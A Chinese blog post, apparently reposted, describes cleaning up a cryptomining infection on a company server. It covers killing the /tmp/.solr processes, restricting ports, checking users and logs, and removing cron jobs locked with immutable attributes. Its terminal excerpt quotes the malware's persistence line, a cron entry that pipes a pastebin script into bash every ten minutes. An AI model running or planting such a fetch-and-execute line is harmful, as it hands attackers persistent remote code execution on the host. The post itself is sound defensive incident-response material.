标签：spool log etc cron 排查 var 挖矿 root 病毒

　　公司服务器负载突然上来了，用top命令查看，发现了一个很诡异的进程；

　　然后grep这个进程的进程号，发现是运行在/tmp/.solr/solrd下；于是赶紧杀进程，删程序，负载就下来了；但是还没有完，用top命令再次查看的时候惊奇的发现有一个solr.sh的脚本在执行，通过grep它的进程号，发现还是运行在tmp下，但是奇怪的是明明脚本在运行，但是在对应路径下找不到该脚本，用find全局查找也找不到；为了不让其继续作恶，赶紧把进程杀了，在阿里云控制台添加了安全组，只允许80，443的请求进来；

　　这还没有完，过一会，solr.sh脚本又开始运行了，但是正主solrd却没有运行；因该是由于端口限制程序包进不来了；于是赶紧做了如下措施：

1、修改服务器密码；
2、检查/etc/passwd、/etc/group文件有没有不熟悉的用户；
3、检查计划任务，这一查不要紧，还真有东西；但是清除计划任务时，发现没有权限，我可是root啊，开玩笑没有权限；于是检查了特殊权限，发现还真有，一个个清除了，又检查了/etc/cron.d/、/etc/cron.daily/、/etc/cron.deny、/etc/cron.hourly/、/etc/cron.monthly/、/etc/crontab、/etc/cron.weekly/无一例外，都有计划任务，还都加了特殊权限；

[root@jira-wiki log]# crontab -l
*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash
[root@jira-wiki log]# crontab -r
/var/spool/cron/root: Operation not permitted
[root@jira-wiki log]# lsattr /var/spool/cron/
----ia-------e-- /var/spool/cron/root
[root@jira-wiki log]# chattr -ia /var/spool/cron/root
[root@jira-wiki log]# lsattr /var/spool/cron/
-------------e-- /var/spool/cron/root
[root@jira-wiki log]# chattr -e /var/spool/cron/root
[root@jira-wiki log]# lsattr /var/spool/cron/
---------------- /var/spool/cron/root
[root@jira-wiki log]#

4、用last查看最近登录的用户；
5、分析/var/log/messages、/var/log/secure日志

标签：spool,log,etc,cron,排查,var,挖矿,root,病毒
来源： https://www.cnblogs.com/zhangzhide/p/15223446.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。